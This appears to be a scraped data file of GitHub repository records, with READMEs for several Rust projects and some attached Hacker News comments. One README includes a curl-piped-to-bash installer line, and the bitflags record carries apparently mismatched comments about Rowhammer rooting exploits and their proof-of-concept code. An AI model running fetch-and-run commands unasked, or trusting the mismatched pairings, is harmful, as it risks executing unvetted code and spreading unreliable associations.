be feasible?Clever! I'm thinking a similar design with a range of hole sizes and wider borders could be a handy generic tool - might have to design and order one next time I'm making boards with QFNs.Does anyone here know what the smallest practical hole size is in acrylic?This is really cool. I wonder if it would make hand assembly worth it for small runs of products? PCBs are already so cheap that assembly is by far the biggest cost of making anything on a circuit board.What a great idea! Might be tricky to make this work with fine-pitch QFPs, but for QFN and wide-pitch ICs (e.g. SOIC) I can see this working really well.There are still dirt-cheap gadgets [1] that you can make before going for a liteplacer.[1] http://vpapanik.blogspot.com/2012/11/low-budget-manual-pick-...I don't get it. If you need 0.1mm accuracy, all the machining, on plastic, mind you, must be done to say 0.05mm accuracy, both in position and size. And, it appears that one of the parts registers to the edge of the pc board, which is inaccurate. Since you got it to work, what am I missing here?Nice, after doing a bit of electronics, I realize how much todays pcb work is unfit for hand soldering (unless you want to enjoy frustration). Having geometric help is never a waste.I guess the thing I don't understand is if you do this for some parts and not others (caps and resistors) how do you not smear their solder pasteUnrelated, but on the termdriver page, CSI codes C and D are labeled as both being \"cursor down\", when they should be \"cursor forward\" and \"cursor back\".Thank you! This will help a lot.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "matrix-org/matrix-rust-sdk", "link": "https://github.com/matrix-org/matrix-rust-sdk", "tags": ["matrix-org", "rust", "sdk"], "stars": 665, "description": "Matrix Client-Server SDK for Rust", "lang": "Rust", "repo_lang": "", "readme": "![Build Status](https://img.shields.io/github/actions/workflow/status/matrix-org/matrix-rust-sdk/ci.yml?style=flat-square)\n[![codecov](https://img.shields.io/codecov/c/github/matrix-org/matrix-rust-sdk/main.svg?style=flat-square)](https://codecov.io/gh/matrix-org/matrix-rust-sdk)\n[![License](https://img.shields.io/badge/License-Apache%202.0-yellowgreen.svg?style=flat-square)](https://opensource.org/licenses/Apache-2.0)\n[![#matrix-rust-sdk](https://img.shields.io/badge/matrix-%23matrix--rust--sdk-blue?style=flat-square)](https://matrix.to/#/#matrix-rust-sdk:matrix.org)\n[![Docs - Main](https://img.shields.io/badge/docs-main-blue.svg?style=flat-square)](https://matrix-org.github.io/matrix-rust-sdk/matrix_sdk/)\n[![Docs - Stable](https://img.shields.io/crates/v/matrix-sdk?color=blue&label=docs&style=flat-square)](https://docs.rs/matrix-sdk)\n\n# matrix-rust-sdk\n\n**matrix-rust-sdk** is an implementation of a [Matrix][] client-server library in [Rust][].\n\n[Matrix]: https://matrix.org/\n[Rust]: https://www.rust-lang.org/\n\n## Project structure\n\nThe rust-sdk consists of multiple crates that can be picked at your convenience:\n\n- **matrix-sdk** - High level client library, with batteries included, you're most likely\n interested in this.\n- **matrix-sdk-base** - No (network) IO client state machine that can be used to embed a\n Matrix client in your project or build a full fledged network enabled client\n lib on top of it.\n- **matrix-sdk-crypto** - No (network) IO encryption state machine that can be\n used to add Matrix E2EE support to your client or client library.\n\n## Minimum Supported Rust Version (MSRV)\n\nThese crates are built with the Rust language version 2021 and require a minimum compiler version of `1.65`.\n\n## Status\n\nThe library is in an alpha state, things that are implemented generally work but\nthe API will change in breaking ways.\n\nIf you are interested in using the matrix-sdk now is the time to try it out and\nprovide feedback.\n\n## Bindings\n\nSome crates of the **matrix-rust-sdk** can be embedded inside other\nenvironments, like Swift, Kotlin, JavaScript, Node.js etc. Please,\nexplore the [`bindings/`](./bindings/) directory to learn more.\n\n## License\n\n[Apache-2.0](https://www.apache.org/licenses/LICENSE-2.0)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "qarmin/szyszka", "link": "https://github.com/qarmin/szyszka", "tags": ["rust", "linux", "gtk", "rename-files"], "stars": 664, "description": "Szyszka is fast and powerful file renamer", "lang": "Rust", "repo_lang": "", "readme": "# Szyszka\n\nSzyszka is a simple but powerful and fast bulk file renamer.\n\n![Szyszka](https://user-images.githubusercontent.com/41945903/126200297-e0552164-2970-449f-9e68-bd47d231e041.png)\n## Features\n- Written in Rust\n- Available for Linux, Mac and Windows\n- Simple GUI created using GTK3\n- Multiple rules which can be freely combined:\n - Replace text\n - Trim text\n - Add text\n - Add numbers\n - Purge text\n - Change letters to upper/lowercase\n - Custom rules\n- Ability to edit, reorder rules and results\n- Handle even hundreds thousands of records\n\n## Requirements\n### Linux\nYou need to install GTK (it should be available by default on most distributions) and the canberra-gtk-module.\n```shell\nsudo apt install libgtk3-dev libcanberra-gtk-module\n```\n### MacOS (not tested)\nYou need to install GTK using brew\n```shell\n/bin/bash -c \"$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)\"\nbrew install rust gtk+3\n```\n\n### Windows\nThe released zip file contains all dependencies, so it work on Windows 7 SP1+. \nIf you want to, you can install the GTK runtime from https://github.com/tschoonj/GTK-for-Windows-Runtime-Environment-Installer/releases, ensure that its environment variables are set properly and run Szyszka from anywhere.\n\n## Installation\n### Precompiled Binaries\nAvailable at https://github.com/qarmin/szyszka/releases\n\n### Snap\nhttps://snapcraft.io/szyszka \n```\nsnap install szyszka\nsudo snap connect szyszka:removable-media # Allows to see files on external devices\n```\n\n### Flatpak\nTODO\n\n### Cargo/Crates.io\nhttps://crates.io/crates/szyszka\n```\ncargo install szyszka\n```\n\n### Gentoo Linux\nszyszka is available on Gentoo's GURU overlay\n```\nemerge -av gui-apps/szyszka\n```\n\n## Future work\n- Adding Regex support\n- Saving/loading presets\n- Trim x number of characters\n\n## Contribution\nContributions are very welcome - bug reports, pull requests, testing etc. \nWhen creating or modifying existing rules, don't forget about updating/adding tests!\n\n## Name \nSzyszka is Polish word which means Pinecone.\n\nWhy such a strange name?\n\nWould you remember another app name like Rename Files Ultra? \nProbably not. \nBut will you remember name Szyszka? \nWell... probably also not, but when you hear this name, you will instantly think of this app.\n\n## Why?\nI know that on Linux, which I primarily use, there is a lot of good file renamers (and even more on Windows), but I couldn't find any that would suit my needs.\nAvailable apps install a lot of dependencies, work slowly or just have a very bloated UI. \n\nIf you want very simple apps without too much of features, look at [Bulky](https://github.com/linuxmint/bulky), [Thunar Bulk Rename](https://docs.xfce.org/xfce/thunar/bulk-renamer/start) or [Nautilus Renamer](https://launchpad.net/nautilus-renamer).\n\n## License\nMIT\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "mbround18/valheim-docker", "link": "https://github.com/mbround18/valheim-docker", "tags": ["valheim", "rust", "odin", "docker", "kubernetes", "gaming", "valheim-docker", "cli", "timezone", "friendly", "user-friendly"], "stars": 664, "description": "Valheim Docker powered by Odin. The Valheim dedicated gameserver manager which is designed with resiliency in mind by providing automatic updates, world backup support, and a user friendly cli interface. ", "lang": "Rust", "repo_lang": "", "readme": "# [Valheim]\n\n\"\"\n\n\"\"\n\"\"\n\"\"\n\n\n[![All Contributors](https://img.shields.io/badge/all_contributors-11-orange.svg?style=flat-square)](#contributors-)\n\n\n## Table of Contents\n\n- [[Valheim]](#valheim)\n - [Table of Contents](#table-of-contents)\n - [Running on a bare-metal Linux Server](#running-on-a-bare-metal-linux-server)\n - [From Release](#from-release)\n - [From Source](#from-source)\n - [Running with Docker](#running-with-docker)\n - [Download Locations](#download-locations)\n - [DockerHub](#dockerhub)\n - [GitHub Container Registry](#github-container-registry)\n - [Environment Variables](#environment-variables)\n - [Container Env Variables](#container-env-variables)\n - [Auto Update](#auto-update)\n - [Auto Backup](#auto-backup)\n - [Docker Compose](#docker-compose)\n - [Simple](#simple)\n - [Everything but the kitchen sink](#everything-but-the-kitchen-sink)\n - [Bundled Tools](#bundled-tools)\n - [[Odin]](#odin)\n - [[Huginn] Http Server](#huginn-http-server)\n - [Feature Information](#feature-information)\n - [BepInEx Support](#bepinex-support)\n - [Webhook Support](#webhook-support)\n - [Guides](#guides)\n - [How to Transfer Files](#how-to-transfer-files)\n - [Additional Information](#additional-information)\n - [Discord Release Notifications](#discord-release-notifications)\n - [Versions](#versions)\n - [Sponsors](#sponsors)\n - [Contributors \u2728](#contributors-)\n > Did you write a guide? or perhaps an article? Add a PR to have it added here in the readme <3\n - [How to Transfer Files](#how-to-transfer-files)\n - [External: Hosting Valheim on Rocket Pi X](https://ikarus.sg/valheim-server-rock-pi-x/)\n - [External: Valheim on AWS](https://aws.amazon.com/getting-started/hands-on/valheim-on-aws/)\n - [External: How to host a dedicated Valheim server on Amazon Lightsail](https://updateloop.dev/dedicated-valheim-lightsail/)\n - [External: Experience With Valheim Game Hosting With Docker](https://norton-setup.support/games/experience-with-valheim-game-hosting-with-docker/)\n - [External: AWS Cloudformation template using Elastic Container Service with a Spot Instance for cost savings](https://github.com/apeabody/Valheim-AWS-ECS-Spot)\n- [Additional Information](#additional-information)\n - [Discord Release Notifications](#discord-release-notifications)\n - [Versions](#versions)\n- [\u2764\ufe0f Sponsors \u2764\ufe0f](#sponsors)\n- [\u2728 Contributors \u2728](#contributors-)\n\n## Running on a bare-metal Linux Server\n\n### From Release\n\n1. Navigate to `https://github.com/mbround18/valheim-docker/releases/latest`\n2. Download the `bundle.zip` to your server\n3. Extract the `bundle.zip`\n4. Make the files executable `chmod +x {odin,huginn}`\n5. Optional: Add the files to your path.\n6. Navigate to the folder where you want your server installed.\n7. Run `odin configure --password \"Your Super Strong Password\"` (you can also supply `--name \"Server Name\"`, `--port \"Server Port\"`, or other arguments available.)\n8. Finally, run `odin start`.\n\n**More in-depth How-to Article:** \n\n### From Source\n\nThis repo bundles its tools in a way that you can run them without having to install docker!\nIf you purely want to run this on a Linux based system, without docker, take a look at the links below <3\n\n- [Installing & Using Odin](./src/odin/README.md)\n The tool [Odin] runs the show and does almost all the heavy lifting in this repo. It starts, stops, and manages your Valheim server instance.\n- [Installing & Using Huginn](./src/huginn/README.md)\n Looking for a way to view the status of your server? Look no further than [Huginn]!\n The [Huginn] project is a http server built on the same source as [Odin] and uses these capabilities to expose a few http endpoints.\n\n> Using the binaries to run on an Ubuntu Server, you will have to be more involved and configure a few things manually.\n> If you want a managed, easy one-two punch to manage your server. Then look at the Docker section <3\n\n## Running with Docker\n\n> This image does use verion 3+ for all of its compose examples.\n> Please use Docker engine >=20 or make adjustments accordingly.\n>\n> [If you are looking for a guide on how to get started click here](https://github.com/mbround18/valheim-docker/discussions/28)\n>\n> Mod Support! It is supported to launch the server with BepInEx but!!!!! as a disclaimer! You take responsibility for debugging why your server won't start.\n> Modding is not supported by the Valheim developers officially yet; Which means you WILL run into errors. This repo has been tested with running ValheimPlus as a test mod and does not have any issues.\n> See [Getting started with mods]\n\n### Download Locations\n\n#### DockerHub\n\n\"DockerHub\n\"DockerHub\n\n#### GitHub Container Registry\n\n\"GHCR\n\"GHCR\n\n### Environment Variables\n\n> See further on down for advanced environment variables.\n\n| Variable | Default | Required | Description |\n| ------------------------- | ----------------- | -------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |\n| PORT | `2456` | TRUE | Sets the port your server will listen on. Take note it will also listen on +2 (ex: 2456, 2457, 2458) |\n| NAME | `Valheim Docker` | TRUE | The name of your server! Make it fun and unique! |\n| WORLD | `Dedicated` | TRUE | This is used to generate the name of your world. |\n| PUBLIC | `1` | FALSE | Sets whether or not your server is public on the server list. |\n| PASSWORD | `` | TRUE | Set this to something unique! |\n| ENABLE_CROSSPLAY | `0` | FALSE | Enable crossplay support as of `Valheim Version >0.211.8` |\n| TYPE | `Vanilla` | FALSE | This can be set to `ValheimPlus`, `BepInEx`, `BepInExFull` or `Vanilla` |\n| MODS | `` | FALSE | This is an array of mods separated by comma and a new line. [Click Here for Examples](./docs/tutorials/getting_started_with_mods.md) Supported files are `zip`, `dll`, and `cfg`. |\n| WEBHOOK_URL | `` | FALSE | Supply this to get information regarding your server's status in a webhook or Discord notification! [Click here to learn how to get a webhook url for Discord](https://help.dashe.io/en/articles/2521940-how-to-create-a-discord-webhook-url) |\n| WEBHOOK_INCLUDE_PUBLIC_IP | `0` | FALSE | Optionally include your server's public IP in webhook notications, useful if not using a static IP address. NOTE: If your server is behind a NAT using PAT with more than one external IP address (very unlikely on a home network), this could be inaccurate if your NAT doesn't maintain your server to a single external IP. |\n| UPDATE_ON_STARTUP | `1` | FALSE | Tries to update the server the container is started. |\n| ADDITIONAL_STEAMCMD_ARGS | `` | FALSE | Sets optional arguments for install |\n\n#### Container Env Variables\n\n| Variable | Default | Required | Description |\n| -------- | --------------------- | -------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |\n| TZ | `America/Los_Angeles` | FALSE | Sets what timezone your container is running on. This is used for timestamps and cron jobs. [Click Here for which timezones are valid.](https://en.wikipedia.org/wiki/List_of_tz_database_time_zones) |\n| PUID | `1000` | FALSE | Sets the User Id of the steam user. |\n| PGID | `1000` | FALSE | Sets the Group Id of the steam user. |\n\n#### Auto Update\n\n| Variable | Default | Required | Description |\n| ------------------------------ | ----------- | -------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |\n| AUTO_UPDATE | `0` | FALSE | Set to `1` if you want your container to auto update! This means at the times indicated by `AUTO_UPDATE_SCHEDULE` it will check for server updates. If there is an update then the server will be shut down, updated, and brought back online if the server was running before. |\n| AUTO_UPDATE_SCHEDULE | `0 1 * * *` | FALSE | This works in conjunction with `AUTO_UPDATE` and sets the schedule to which it will run an auto update. [If you need help figuring out a cron schedule click here] |\n| AUTO_UPDATE_PAUSE_WITH_PLAYERS | `0` | FALSE | Does not process an update for the server if there are players online. |\n\nAuto update job, queries steam and compares it against your internal steam files for differential in version numbers.\n\n#### Auto Backup\n\n| Variable | Default | Required | Description |\n| --------------------------------- | -------------- | -------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------- |\n| AUTO_BACKUP | `0` | FALSE | Set to `1` to enable auto backups. Backups are stored under `/home/steam/backups` which means you will have to add a volume mount for this directory. |\n| AUTO_BACKUP_SCHEDULE | `*/15 * * * *` | FALSE | Change to set how frequently you would like the server to backup. [If you need help figuring out a cron schedule click here]. |\n| AUTO_BACKUP_NICE_LEVEL | `NOT SET` | FALSE | [Do NOT set this variable unless you are following this guide here](https://github.com/mbround18/valheim-docker/discussions/532) |\n| AUTO_BACKUP_REMOVE_OLD | `1` | FALSE | Set to `0` to keep all backups or manually manage them. |\n| AUTO_BACKUP_DAYS_TO_LIVE | `3` | FALSE | This is the number of days you would like to keep backups for. While backups are compressed and generally small it is best to change this number as needed. |\n| AUTO_BACKUP_ON_UPDATE | `0` | FALSE | Create a backup on right before updating and starting your server. |\n| AUTO_BACKUP_ON_SHUTDOWN | `0` | FALSE | Create a backup on shutdown. |\n| AUTO_BACKUP_PAUSE_WITH_NO_PLAYERS | `0` | FALSE | Will skip creating a backup if there are no players. `PUBLIC` must be set to `1` for this to work! |\n\nAuto backup job produces an output of a `*.tar.gz` file which should average around 30mb for a world that has an average of 4 players consistently building on. You should be aware that if you place the server folder in your saves folder your backups could become astronomical in size. This is a common problem that others have observed, to avoid this please follow the guide for how volume mounts should be made in the `docker-compose.yml`.\n\n#### Scheduled Restarts\n\nScheduled restarts allow th operator to trigger restarts on a cron job\n\n| Variable | Default | Required | Description |\n| -------------------------- | ----------- | -------- | ------------------------------------------------------------------ |\n| SCHEDULED_RESTART | `0` | FALSE | Allows you to enable scheduled restarts |\n| SCHEDULED_RESTART_SCHEDULE | `0 2 * * *` | FALSE | Defaults to everyday at 2 am but can be configured with valid cron |\n\n## Docker Compose\n\n> This image does use verion 3+ for all of its compose examples.\n> Please use Docker engine >=20 or make adjustments accordingly.\n\n### Simple\n\n> This is a basic example of a docker compose, you can apply any of the variables above to the `environment` section below but be sure to follow each variables' description notes!\n\n```yaml\nversion: \"3\"\nservices:\n valheim:\n image: mbround18/valheim:latest\n stop_signal: SIGINT\n ports:\n - \"2456:2456/udp\"\n - \"2457:2457/udp\"\n - \"2458:2458/udp\"\n environment:\n PORT: 2456\n NAME: \"Created With Valheim Docker\"\n WORLD: \"Dedicated\"\n PASSWORD: \"Banana Phone\"\n TZ: \"America/Chicago\"\n PUBLIC: 1\n volumes:\n - ./valheim/saves:/home/steam/.config/unity3d/IronGate/Valheim\n - ./valheim/server:/home/steam/valheim\n```\n\n### Everything but the kitchen sink\n\n```yaml\nversion: \"3\"\nservices:\n valheim:\n image: mbround18/valheim:latest\n stop_signal: SIGINT\n ports:\n - \"2456:2456/udp\"\n - \"2457:2457/udp\"\n - \"2458:2458/udp\"\n environment:\n PORT: 2456\n NAME: \"Created With Valheim Docker\"\n WORLD: \"Dedicated\"\n PASSWORD: \"Strong! Password @ Here\"\n TZ: \"America/Chicago\"\n PUBLIC: 1\n AUTO_UPDATE: 1\n AUTO_UPDATE_SCHEDULE: \"0 1 * * *\"\n AUTO_BACKUP: 1\n AUTO_BACKUP_SCHEDULE: \"*/15 * * * *\"\n AUTO_BACKUP_REMOVE_OLD: 1\n AUTO_BACKUP_DAYS_TO_LIVE: 3\n AUTO_BACKUP_ON_UPDATE: 1\n AUTO_BACKUP_ON_SHUTDOWN: 1\n WEBHOOK_URL: \"https://discord.com/api/webhooks/IM_A_SNOWFLAKE/AND_I_AM_A_SECRET\"\n WEBHOOK_INCLUDE_PUBLIC_IP: 1\n UPDATE_ON_STARTUP: 0\n volumes:\n - ./valheim/saves:/home/steam/.config/unity3d/IronGate/Valheim\n - ./valheim/server:/home/steam/valheim\n - ./valheim/backups:/home/steam/backups\n```\n\n## Bundled Tools\n\n### [Odin]\n\nThis repo has a CLI tool called [Odin] in it! It is used for managing the server inside the container. If you are looking for instructions for it click here: [Odin]\n\n[Click here to see advanced environment variables for Odin](src/odin/README.md)\n\n### [Huginn] Http Server\n\n| Variable | Default | Required | Description |\n| --------- | --------------------- | -------- | ---------------------------------------------------------------------------------------------------------------------------- |\n| ADDRESS | `Your Public IP` | FALSE | This setting is used in conjunction with `odin status` and setting this will stop `odin` from trying to fetch your public IP |\n| HTTP_PORT | `anything above 1024` | FALSE | Setting this will spin up a little http server that provides two endpoints for you to call. |\n\n- `/metrics` provides a prometheous style metrics output.\n- `/status` provides a more traditional status page.\n\n> Note on `ADDRESS` this can be set to `127.0.0.1:` or `:` but does not have to be set. If it is set, it will prevent odin from reaching out to aws ip service from asking for your public IP address. Keep in mind, your query port is +1 of what you set in the `PORT` env variable for your valheim server.\n\n> Another note: your server MUST be public (eg. `PUBLIC=1`) in order for Odin+Huginn to collect and report statistics.\n\n## Feature Information\n\n### [BepInEx Support](./docs/bepinex.md)\n\nAs of [March 2021](./docs/bepinex.md) the TYPE variable can be used to automatically install BepInEx. For details see [Getting started with mods].\n\n### [Webhook Support](./docs/webhooks.md)\n\nThis repo can automatically send notifications to discord via the WEBHOOK_URL variable.\nOnly use the documentation link below if you want advanced settings!\n\n[Click Here to view documentation on Webhook Support](./docs/webhooks.md)\n\n## Guides\n\n### [How to Transfer Files](./docs/tutorials/how-to-transfer-files.md)\n\nThis is a tutorial of a recommended path to transfering files. This can be done to transfer world files between hosts, transfer BepInEx configs, or even to transfer backups.\n\n[Click Here to view the tutorial of how to transfer files.](./docs/tutorials/how-to-transfer-files.md)\n\n## Additional Information\n\n### Discord Release Notifications\n\nIf you would like to have release notifications tied into your Discord server, click here:\n\n\"Discord\n\n**Note**: The discord is PURELY for release notifications and any + all permissions involving sending chat messages has been disabled.\n[Any support for this repository must take place on the Discussions.](https://github.com/mbround18/valheim-docker/discussions)\n\n### Versions\n\n- latest (Stable): Mod support! and cleaned up the code base.\n- 1.4.x (Stable): Webhook for discord upgrade.\n- 1.3.x (Stable): Health of codebase improvements.\n- 1.2.0 (Stable): Added additional stop features and sig for stopping.\n- 1.1.1 (Stable): Patch to fix arguments\n- 1.1.0 (Unstable): Cleaned up image and made it faster\n- 1.0.0 (Stable): It works!\n\n[//]: <> (Links below...................)\n[Odin]: src/odin/README.md\n[Huginn]: src/huginn/README.md\n[Valheim]: https://www.valheimgame.com/\n[Getting started with mods]: ./docs/tutorials/getting_started_with_mods.md\n[If you need help figuring out a cron schedule click here]: https://crontab.guru/#0_1*\\_\\_\\_\\_\\*\n\n[//]: <> (Image Base Url: https://github.com/mbround18/valheim-docker/blob/main/docs/assets/name.png?raw=true)\n\n## Sponsors\n\n\n## Contributors \u2728\n\nThanks goes to these wonderful people ([emoji key](https://allcontributors.org/docs/en/emoji-key)):\n\n\n\n\n\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n
\"\"/
Mark

\ud83d\udcd6
\"\"/
Michael

\ud83d\ude87 \ud83d\udcbb \ud83d\udcd6
\"\"/
imgbot[bot]

\ud83d\udcd6
\"\"/
Jonathan Boudreau

\ud83d\udcbb
\"\"/
Luk\u00e1\u0161 Hru\u0161ka

\ud83d\udcd6
\"\"/
Julian Vall\u00e9e

\ud83d\udcbb
\"\"/
Finomnis

\ud83d\udcbb
\"\"/
Justin Byrne

\ud83d\udcd6
\"\"/
Andrew Peabody

\ud83d\udcd6 \ud83d\udcbb
\"\"/
Jorge Morales

\ud83d\udcbb
\"\"/
Spanner_Man

\ud83d\udcd6
\n\n\n\n\n\n\nThis project follows the [all-contributors](https://github.com/all-contributors/all-contributors) specification. Contributions of any kind welcome!\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "bitflags/bitflags", "link": "https://github.com/bitflags/bitflags", "tags": ["bitflags", "structures", "macros"], "stars": 664, "description": "A macro to generate structures which behave like bitflags", "lang": "Rust", "repo_lang": "", "readme": "bitflags\n========\n\n[![Rust](https://github.com/bitflags/bitflags/workflows/Rust/badge.svg)](https://github.com/bitflags/bitflags/actions)\n[![Latest version](https://img.shields.io/crates/v/bitflags.svg)](https://crates.io/crates/bitflags)\n[![Documentation](https://docs.rs/bitflags/badge.svg)](https://docs.rs/bitflags)\n![License](https://img.shields.io/crates/l/bitflags.svg)\n\nA Rust macro to generate structures which behave like a set of bitflags\n\n- [Documentation](https://docs.rs/bitflags)\n- [Release notes](https://github.com/bitflags/bitflags/releases)\n\n## Usage\n\nAdd this to your `Cargo.toml`:\n\n```toml\n[dependencies]\nbitflags = \"2.0.0-rc.2\"\n```\n\nand this to your source code:\n\n```rust\nuse bitflags::bitflags;\n```\n\n## Example\n\nGenerate a flags structure:\n\n```rust\nuse bitflags::bitflags;\n\n// The `bitflags!` macro generates `struct`s that manage a set of flags.\nbitflags! {\n #[derive(Debug, Clone, Copy, PartialEq, Eq, PartialOrd, Ord, Hash)]\n struct Flags: u32 {\n const A = 0b00000001;\n const B = 0b00000010;\n const C = 0b00000100;\n const ABC = Self::A.bits | Self::B.bits | Self::C.bits;\n }\n}\n\nfn main() {\n let e1 = Flags::A | Flags::C;\n let e2 = Flags::B | Flags::C;\n assert_eq!((e1 | e2), Flags::ABC); // union\n assert_eq!((e1 & e2), Flags::C); // intersection\n assert_eq!((e1 - e2), Flags::A); // set difference\n assert_eq!(!e2, Flags::A); // set complement\n}\n```\n\n## Rust Version Support\n\nThe minimum supported Rust version is 1.46 due to use of associated constants and const functions.\n", "readme_type": "markdown", "hn_comments": "I first read bout this a few months ago. Coming from a hardware background I was particularly struck by how damned clever this is!Dumb question (maybe OT): why is rooting phones so hard in the first place? Shouldn't root permissions be part of device ownership (akin to fair use)? Why do I have to hack my own phone to get unfettered access?Rowhammer was first presented in 2014https://en.wikipedia.org/wiki/Row_hammer> In a statement, Google officials wrote: \"After researchers reported this issue to our Vulnerability Rewards Program, we worked closely with them to deeply understand it in order to better secure our users. We\u2019ve developed a mitigation which we will include in our upcoming November security bulletin.\"Then why am I reading about this in October?So, the proof of concept code is at https://github.com/vusec/drammer . Can we get a reliable rooting tool based on this?This hardware defect just keeps on giving.Since we're unlikely to see larger memory cells again, mitigations will likely be applied. There is a good question on a discussion board [1] from last year about memory scrambling and its utility here; but with no responses. Can these questions be answered? Some points about memory scrambling are also made here [2] by Kim of the 2014 CMU paper.[1] https://groups.google.com/forum/#!topic/rowhammer-discuss/tp...[2] https://github.com/CMU-SAFARI/rowhammerVery interesting application of the rowhammer. Funny that it comes at the same time http://dirtycow.ninja allows us to write very reliable and portable exploits (which should be applicable to Android).There's something about Rowhammer that warms the cockles of my heart.So any bets on when a jailbreak based on this is developed?Interesting. This is not something that has a simple fix and can be patched. The arms race continues.Or we could end it and give users (limited) root access to their stock phones. Let us run OCI containers with restricted root user accounts. Bind mount certain filesystems given the correct Android permissions, such as the SD card or internal storage, or the user's emulated root. Or supported nested ARM virtualization.Modern Linux supports a uid 0 with less than complete access in a cgroup, using the LSM to regulate specific capabilities, or creating the cgroup with limited caps to begin with.Make access to areas the carrier considers sensitive conditional on a capability, or limit access to the full video decode hardware or shared memory from this root jail.I have been able to compile but not run the runc binary from OCI/docker/rkt. Nested cgroupfs would solve a lot of these restrictions.> It's not uncommon for different generations of the same phone model to use different memory chips.Actually the same generation of the same phone can use different memory chips and be produced by different manufacturers. It's very common for Apple and Samsung where they can't source enough parts from a single manufacturer.Is there any way to statically analyze an app for code that might be attempting to execute a rowhammer attack? I'd imagine that rowhammer requires a tight loop doing nothing but writing to the same value in memory repeatedly, or something similarly recognizable. Such a tool could be used to at least keep any malicious apps out of the play store. It would probably be fine if it sometimes gave false positives on innocuous code that a human (at Google) could override after inspecting the suspect code.On the one hand, you could argue that this is not a good thing because the hardware is fundamentally buggy. On the other hand, and this may be a bit of a contrarian view, if it leads to \"the insecurity that gives us freedom\", maybe it's not all so bad after all... although in this case, it might be too much of a free-for-all. But given how locked-down mobile devices are by default, this almost feels like a breath of fresh air.https://www.gnu.org/philosophy/right-to-read.en.htmlhttp://boingboing.net/2012/01/10/lockdown.htmlhttp://boingboing.net/2012/08/23/civilwar.htmlPerhaps we'll finally start being able to get mobile devices with ECC memory, now that its useful for preventing the nominal owners of devices from having actual control or visibility into their operation.I never heard of Thunderclap before, maybe this is a viral campaign to advertise a viral campaigning tool.Anyhow, Antiviral is a pretty good movie.https://en.wikipedia.org/wiki/Antiviral_(film)Shame this didn't make it to the front page...", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "doyoubi/undermoon", "link": "https://github.com/doyoubi/undermoon", "tags": ["redis", "redis-cluster", "rust", "proxy", "slot", "migration", "redis-clusters", "redis-instances", "redis-protocol", "redis-proxy", "failover", "scale", "redis-cloud", "cloud", "kubernetes", "k8s", "redis-cluster-protocol"], "stars": 663, "description": "Mordern Redis Cluster solution for easy operation.", "lang": "Rust", "repo_lang": "", "readme": "![undermoon logo](docs/undermoon-logo.svg)\n\n# Undermoon ![Continuous Integration](https://github.com/doyoubi/undermoon/workflows/Continuous%20Integration/badge.svg?event=push)\n`Undermoon` is a self-managed Redis clustering system based on **Redis Cluster Protocol** supporting:\n\n- Horizontal scalability and high availability\n- Cluster management through HTTP API\n- Automatic failover for both master and replica\n- Fast scaling\n\nAny storage system implementing redis protocol could also somehow work with undermoon,\nsuch as [KeyDB](https://github.com/JohnSully/KeyDB).\n\nFor more in-depth explanation of Redis Cluster Protocol and how Undermoon implement it,\nplease refer to [Redis Cluster Protocol](./docs/redis_cluster_protocol.md).\n\n## Architecture\n![architecture](docs/architecture.svg)\n##### Metadata Storage\nMetadata storage stores all the metadata of the whole `undermoon` cluster,\nincluding existing Redis instances, proxies, and exposed Redis clusters.\nNow it's an in-memory storage server called `Memory Broker`.\nWhen using [undermoon-operator](https://github.com/doyoubi/undermoon-operator),\nthis `Memory Broker` will change to use `ConfigMap` to store the data.\n\n##### Coordinator\nCoordinator will synchronize the metadata between broker and server proxy.\nIt also actively checks the liveness of server proxy and initiates failover.\n\n##### Storage Cluster\nThe storage cluster consists of server proxies and Redis instances.\nIt serves just like the official Redis Cluster to the applications.\nA Redis Cluster Proxy could be added between it and applications\nso that applications don't need to upgrade their Redis clients to smart clients.\n\n###### Chunk\nChunk is the smallest building block of every single exposed Redis Cluster.\nEach chunk consists of 4 Redis instances and 2 server proxies evenly distributed in two different physical machines.\nSo the node number of each Redis cluster will be the multiples of 4 with half masters and half replicas.\n\nThe design of chunk makes it very easy to build a cluster with a good topology for **workload balancing**.\n\n## Getting Started\n### Run Undermoon in Kubernetes\nUsing [undermoon-operator](https://github.com/doyoubi/undermoon-operator)\nis the easiest way to create Redis clusters if you have Kubernetes.\n\n```\nhelm install my-undermoon-operator undermoon-operator-.tgz\n\nhelm install \\\n --set 'cluster.clusterName=my-cluster-name' \\\n --set 'cluster.chunkNumber=2' \\\n --set 'cluster.maxMemory=2048' \\\n --set 'cluster.port=5299' \\\n my-cluster \\\n -n my-namespace \\\n undermoon-cluster-.tgz\n```\n\nSee the `README.md` of [undermoon-operator](https://github.com/doyoubi/undermoon-operator)\nfor how to use it.\n\n### Run Undermoon Using Docker Compose\nSee [docker compose example](./docs/docker_compose_example.md).\n\n### Setup Undermoon Manually\nOr you can set them up without docker following this docs: [setting up undermoon manually](docs/set_up_manually.md).\n\n## Development\n`undermoon` tries to avoid `unsafe` and some calls that could crash like `unwrap`.\n\nRun the following commands before committing your codes:\n```\n$ make lint\n$ make test\n```\n\nSee more in the [development guide](./docs/development.md).\n\n## Documentation\n- [Redis Cluster Protocol and Server Proxy](./docs/redis_cluster_protocol.md)\n- [Chunk](./docs/chunk.md)\n- [Slot Migration](./docs/slots_migration.md)\n- [Memory Broker Replica](./docs/mem_broker_replica.md)\n- [Configure to support non-cluster-mode clients](./docs/active_redirection.md)\n- [Command Table](./docs/command_table.md)\n- [Performance](./docs/performance.md)\n- [Best Practice](./docs/best_practice.md)\n- [Broker External Storage](./docs/broker_external_storage.md)\n\n## API\n- [Proxy UMCTL command](./docs/meta_command.md)\n- [HTTP Broker API](./docs/broker_http_api.md)\n- [Memory Broker API](./docs/memory_broker_api.md)\n", "readme_type": "markdown", 